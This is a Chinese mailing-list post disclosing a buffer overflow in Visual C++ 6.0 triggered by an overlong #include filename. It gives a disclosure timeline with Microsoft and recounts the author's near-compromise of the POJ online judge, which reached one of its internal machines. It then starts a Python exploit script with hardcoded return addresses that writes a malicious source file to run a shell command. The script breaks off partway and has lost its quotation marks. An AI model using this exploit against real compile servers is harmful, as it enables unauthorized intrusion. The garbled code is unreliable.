from:幻影maillist憋了半年了。问题处在include的文件名长度未检测。比如#include "AAAA....AA"(超多A)就会挂。<=2008-2-17 发现漏洞。2008-3-3 报告给MS，当天收到答复，说正在研究中。2008-3-4 MS确认这是一个安全缺陷，但说Visual C++ 6.0的产品支持生命周期已经于2005年9月30日结束，因此不会为这个漏洞发布安全公告或安全建议，且建议我不要公开。我差点利用这个漏洞黑了poj（acm.pku.edu.cn，做acm的同学应该都知道这个网站）。可惜功亏一篑，只得到了一台没有价值的内网机器，最后和管理员摊牌了。既然现在poj已经把vc6.0换成了vs2008，那我就没有继续憋着的理由了哈哈。下面给出两个不同的vc6.0 sp6的exp，其他的sp可能偏移不一样，自己调试吧。vc6_exp.py#######################################################################!/usr/bin/env python# vc6 exploit by cly# 2008-2-17import structaddress_jmp_esp = 0x1065AEB3address_system = 0x77BF93C7address_exit = 0x77C09E7Efilename = e.ccmd = calcf = open(filename, wb)f.write(#include "c:\\A + cmd + || + A * (146 - len(cmd))+ struct.pack(